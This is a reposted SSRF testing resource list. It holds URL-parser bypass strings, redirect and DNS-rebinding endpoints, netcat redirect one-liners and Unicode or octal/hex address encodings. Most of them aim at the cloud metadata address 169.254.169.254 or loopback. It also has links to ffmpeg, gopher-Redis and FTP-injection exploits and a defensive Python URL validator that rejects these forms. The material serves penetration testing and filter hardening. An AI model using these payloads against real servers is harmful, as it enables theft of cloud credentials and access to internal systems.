SSRF (Server-Side Request Forgery) testing resources
Quick URL-based bypasses:
http://google.com:80+&@127.88.23.245:22/#[email protected]:80/
http://127.88.23.245:22/+&@google.com:80#[email protected]:80/
http://google.com:80+&@google.com:80#[email protected]:22/
http://127.88.23.245:22/[email protected]:80/
http://127.88.23.245:22/#@www.google.com:80/
htaccess - redirect tests for various cases
Status codes: 300, 301, 302, 303, 305, 307, 308
File types: jpg, json, csv, xml
Live demo:
JPG 301 response without and with a valid response body:
https://ssrf.localdomain.pw/img-without-body/301-http-169.254.169.254:80-.i.jpg
https://ssrf.localdomain.pw/img-without-body-md/301-http-.i.jpg
https://ssrf.localdomain.pw/img-with-body/301-http-169.254.169.254:80-.i.jpg
https://ssrf.localdomain.pw/img-with-body-md/301-http-.i.jpg
JSON 301 response without and with a valid response body:
https://ssrf.localdomain.pw/json-without-body/301-http-169.254.169.254:80-.j.json
https://ssrf.localdomain.pw/json-without-body-md/301-http-.j.json
https://ssrf.localdomain.pw/json-with-body/301-http-169.254.169.254:80-.j.json
https://ssrf.localdomain.pw/json-with-body-md/301-http-.j.json
CSV 301 response without and with a valid response body:
https://ssrf.localdomain.pw/csv-without-body/301-http-169.254.169.254:80-.c.csv
https://ssrf.localdomain.pw/csv-without-body-md/301-http-.c.csv
https://ssrf.localdomain.pw/csv-with-body/301-http-169.254.169.254:80-.c.csv
https://ssrf.localdomain.pw/csv-with-body-md/301-http-.c.csv
XML 301 response without and with a valid response body:
https://ssrf.localdomain.pw/xml-without-body/301-http-169.254.169.254:80-.x.xml
https://ssrf.localdomain.pw/xml-without-body-md/301-http-.x.xml
https://ssrf.localdomain.pw/xml-with-body/301-http-169.254.169.254:80-.x.xml
https://ssrf.localdomain.pw/xml-with-body-md/301-http-.x.xml
custom-30x - custom 30x response with a Location header, using PHP
Live demo:
https://ssrf.localdomain.pw/custom-30x/?code=332&url=http://169.254.169.254/&content-type=YXBwbGljYXRpb24vanNvbg==&body=eyJhIjpbeyJiIjoiMiIsImMiOiIzIn1dfQ==&fakext=/j.json
custom-200 - custom 200 response with a Content-Location header, using PHP
Live demo:
https://ssrf.localdomain.pw/custom-200/?url=http://169.254.169.254/&content-type=YXBwbGljYXRpb24vanNvbg==&body=eyJhIjpbeyJiIjoiMiIsImMiOiIzIn1dfQ==&fakext=/j.json
custom-201 - custom 201 response with a Location header, using PHP
Live demo:
https://ssrf.localdomain.pw/custom-201/?url=http://169.254.169.254/&content-type=YXBwbGljYXRpb24vanNvbg==&body=eyJhIjpbeyJiIjoiMiIsImMiOiIzIn1dfQ==&fakext=/j.json
Minimal web server using netcat (the newline escapes were lost in extraction and are restored here; the HTTP response needs a blank line between headers and body, and the JSON quotes must be escaped inside the double-quoted string):
while true ; do nc -l -p 80 -c 'echo -e "HTTP/1.1 302 Found\nContent-Type: application/json\nLocation: http://169.254.169.254/\n\n{\"a\":\"b\"}"'; done
while true ; do nc -l -p 554 -c 'echo -e "RTSP/1.0 301 Moved\nCSeq: 1\nLocation: http://169.254.169.254/"'; done
ip.py - alternative IP encoding tool for SSRF testing
python ip.py IP PORT WhiteListedDomain EXPORT (optional)
python ip.py 169.254.169.254 80 www.google.com
python ip.py 169.254.169.254 80 www.google.com export
DNS pinning
nslookup ssrf-169.254.169.254.localdomain.pw
nslookup ssrf-cloud.localdomain.pw
http://xip.io/
nslookup 169.254.169.254.xip.io
nslookup 1ynrnhl.xip.io
nslookup www.owasp.org.1ynrnhl.xip.io
nslookup 127.127.127.127.xip.io
DNS pinning race condition
nslookup ssrf-race-169.254.169.254.localdomain.pw
DNS rebinding
pip install twisted
python dns.py WhitelistedIP InternalIP Port
python dns.py 216.58.214.206 169.254.169.254 53
http://webcache.googleusercontent.com/search?q=cache:http://www.611eternity.com/DNSRebinding%E6%8A%80%E6%9C%AF%E5%AD%A6%E4%B9%A0/
cloud-metadata.txt - cloud metadata dictionary for SSRF testing
svg - SSRF with SVG files
ffmpeg - SSRF with ffmpeg
https://hackerone.com/reports/237381
https://hackerone.com/reports/243470
https://github.com/neex/ffmpeg-avi-m3u-xbin
https://www.blackhat.com/docs/us-16/materials/us-16-Ermishkin-Viral-Video-Exploiting-Ssrf-In-Video-Converters.pdf
https://docs.google.com/presentation/d/1yqWy_aE3dQNXAhW8kxMxRqtP7qMHaIfMzUDpEqFneos/edit#slide=id.g22371f2702_0_15
iframe - SSRF with an HTML iframe + URL bypass
Live demo:
http://ssrf.localdomain.pw/iframe/?proto=http&ip=127.0.0.1&port=80&url=/
Abusing enclosed alphanumerics (Unicode circled letters and digits, ideographic full stops as separators)
http://169。254。169。254/
http://169。254。169。254/
http://⑯⑨。②⑤④。⑯⑨。②⑤④/
http://⓪ⓧⓐ⑨。⓪ⓧⓕⓔ。⓪ⓧⓐ⑨。⓪ⓧⓕⓔ:80/
http://⓪ⓧⓐ⑨ⓕⓔⓐ⑨ⓕⓔ:80/
http://②⑧⑤②⓪③⑨①⑥⑥:80/
http://④②⑤。⑤①⓪。④②⑤。⑤①⓪:80/
http://⓪②⑤①。⓪③⑦⑥。⓪②⑤①。⓪③⑦⑥:80/
http://⓪⓪②⑤①。⓪⓪⓪③⑦⑥。⓪⓪⓪⓪②⑤①。⓪⓪⓪⓪⓪③⑦⑥:80/
http://[::①⑥⑨。②⑤④。⑯⑨。②⑤④]:80/
http://[::ⓕⓕⓕⓕ:①⑥⑨。②⑤④。⑯⑨。②⑤④]:80/
http://⓪ⓧⓐ⑨。⓪③⑦⑥。④③⑤①⑧:80/
http://⓪ⓧⓐ⑨。⑯⑥⑧⑨⑥⑥②:80/
http://⓪⓪②⑤①。⑯⑥⑧⑨⑥⑥②:80/
http://⓪⓪②⑤①。⓪ⓧⓕⓔ。④③⑤①⑧:80/
common-open-ports.txt - list of common open ports
Java / Python FTP injection allows firewall bypass
http://webcache.googleusercontent.com/search?q=cache:http://blog.blindspotsecurity.com/2017/02/advisory-javapython-ftp-injections.html
https://github.com/ecbftw/poc/blob/master/java-python-ftp-injection/ftp-injection-server.py
http://webcache.googleusercontent.com/search?q=cache:https://shiftordie.de/blog/2017/02/18/smtp-over-xxe/
SSRF + Gopher + Redis
http://webcache.googleusercontent.com/search?q=cache:http://vinc.top/2016/11/24/%E3%80%90ssrf%E3%80%91ssrfgopher%E6%90%9E%E5%AE%9A%E5%86%85%E7%BD%91%E6%9C%AA%E6%8E%88%E6%9D%83redis/
https://webcache.googleusercontent.com/search?q=cache:http://antirez.com/news/96
Top 5 features that are frequently vulnerable to SSRF:
https://webcache.googleusercontent.com/search?q=cache:https://www.hackerone.com/blog-How-To-Server-Side-Request-Forgery-SSRF
AppSecEU15-Server_side_browsing_considered_harmful.pdf
Black Hat USA 2017: A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages (PDF)
A tiny URL fuzzer
https://github.com/orangetw/Tiny-URL-Fuzzer
Bypassing Server-Side Request Forgery filters by abusing a bug in Ruby's native resolver
https://edoverflow.com/2017/ruby-resolv-bug/
https://hackerone.com/reports/287245
https://hackerone.com/reports/215105
0177.1 => 127.0.0.1
0x7f.1 => 127.0.0.1
127.1 => 127.0.0.1
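The URL-parser confusion payloads at the top of this page, the enclosed-alphanumeric and legacy inet_aton address forms (octal, hex, decimal, partial dotted quads, IPv4 embedded in IPv6), and the DNS rebinding case all defeat filters that inspect the URL string as written. The following validator is an added defensive example, not part of the SSRF-Testing project: it first folds the Unicode tricks with NFKC and the IDNA dot mapping, then parses the host, reduces every numeric form to a canonical address via a re-implementation of the BSD inet_aton shorthand rules, and rejects anything that is not a public address. The resolver table, the name rebind.invalid and the function names are constructed for this demo; production code would resolve with socket.getaddrinfo and connect to the address it validated rather than letting the HTTP client resolve the name again.

```python
import ipaddress
import re
import unicodedata
from urllib.parse import urlsplit

# Dots that IDNA (UTS #46) folds to '.', including U+3002 as used in the list above.
DOT_VARIANTS = "\u3002\uff0e\uff61"
# One DNS label: letters, digits, hyphen; no leading/trailing hyphen; at most 63 chars.
LABEL_RE = re.compile(r"^(?!-)[a-z0-9-]{1,63}(?<!-)$")

# Constructed lookup table standing in for DNS; 216.58.214.206 is the page's example public IP.
DEMO_DNS = {
    "www.google.com": ["216.58.214.206"],
    "rebind.invalid": ["216.58.214.206", "169.254.169.254"],  # constructed rebinding case
}

def demo_resolver(name):
    return DEMO_DNS.get(name, [])

def canonicalize_url_text(url):
    """NFKC turns enclosed alphanumerics into ASCII (⑯ -> 16, ⓧ -> x); the dot
    variants become '.', as IDNA processing would do before any lookup."""
    text = unicodedata.normalize("NFKC", url)
    for dot in DOT_VARIANTS:
        text = text.replace(dot, ".")
    return text

def parse_legacy_ipv4(host):
    """Parse BSD inet_aton shorthand (0177.1, 0x7f.1, 127.1, 2852039166, 0xa9.0376.43518).
    Returns an IPv4Address, or None if the text is not such a numeric form."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    values = []
    for p in parts:
        if re.fullmatch(r"0[xX][0-9a-fA-F]+", p):
            values.append(int(p[2:], 16))       # hex part
        elif re.fullmatch(r"0[0-7]*", p):
            values.append(int(p, 8))            # octal part (leading zero)
        elif re.fullmatch(r"[1-9][0-9]*", p):
            values.append(int(p, 10))           # decimal part
        else:
            return None
    # Every part but the last is one byte; the last fills all remaining bytes.
    remaining = 4 - (len(values) - 1)
    if any(v > 255 for v in values[:-1]) or values[-1] >= 256 ** remaining:
        return None                             # overflowing parts are rejected, not wrapped
    n = 0
    for v in values[:-1]:
        n = (n << 8) | v
    return ipaddress.IPv4Address((n << (8 * remaining)) | values[-1])

def host_to_ip(host):
    """Return the address an IP literal denotes (IPv4 unwrapped from IPv6 forms), or None for a DNS name."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return parse_legacy_ipv4(host)
    if isinstance(ip, ipaddress.IPv6Address):
        if ip.ipv4_mapped is not None:          # ::ffff:a.b.c.d
            return ip.ipv4_mapped
        if int(ip) < 2 ** 32:                   # ::a.b.c.d (deprecated IPv4-compatible form)
            return ipaddress.IPv4Address(int(ip))
    return ip

def is_allowed_target(ip):
    return ip.is_global and not ip.is_loopback and not ip.is_link_local

def classify_url(url, resolver):
    """Return ("allow", ip_string, port) or ("reject", reason, None)."""
    try:
        parts = urlsplit(canonicalize_url_text(url))
        port = parts.port
    except ValueError as exc:
        return ("reject", "unparseable URL: %s" % exc, None)
    if parts.scheme not in ("http", "https"):
        return ("reject", "scheme not allowed", None)
    if "@" in parts.netloc:                     # parsers disagree on userinfo; refuse it outright
        return ("reject", "userinfo in authority", None)
    host = parts.hostname
    if not host:
        return ("reject", "empty host", None)
    ip = host_to_ip(host)
    if ip is None:
        if not all(LABEL_RE.match(label) for label in host.split(".")):
            return ("reject", "neither an IP literal nor a valid DNS name", None)
        resolved = [host_to_ip(a) for a in resolver(host)]
        if not resolved or any(r is None or not is_allowed_target(r) for r in resolved):
            return ("reject", "name resolves to a non-public address", None)
        ip = resolved[0]
    elif not is_allowed_target(ip):
        return ("reject", "non-public address literal", None)
    return ("allow", str(ip), port or (443 if parts.scheme == "https" else 80))

if __name__ == "__main__":
    for u in ("http://www.google.com/", "http://⓪ⓧⓐ⑨。⓪③⑦⑥。④③⑤①⑧:80/",
              "http://[::ⓕⓕⓕⓕ:①⑥⑨。②⑤④。⑯⑨。②⑤④]:80/", "http://0177.1/",
              "http://google.com:80+&@127.88.23.245:22/", "http://rebind.invalid/"):
        print(u, "->", classify_url(u, demo_resolver))
```

The returned IP is the one to connect to: pinning the validated address closes the rebinding window, and the same check must run on every Location header when the fetcher is configured not to follow redirects automatically, which is what the 30x test cases above are probing.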
SSRF tips
http://webcache.googleusercontent.com/search?q=cache:http://blog.safebuff.com/2016/07/03/SSRF-Tips/
PHP SSRF techniques
https://medium.com/secjuice/php-ssrf-techniques-9d422cb28d51
SSRF bible
https://docs.google.com/document/d/1v1TkWZtrhzRLy0bYXBcdLUedXGb9njTNIJXa3u9akHM
SSRF Proxy
https://github.com/bcoles/ssrf_proxy
SSRF Proxy facilitates tunneling HTTP communications through servers vulnerable to Server-Side Request Forgery.
Reposted from GitHub; the project address is in the original article.
This article was first published on the WeChat public account 逢人斗智斗勇: SSRF Bypass Tips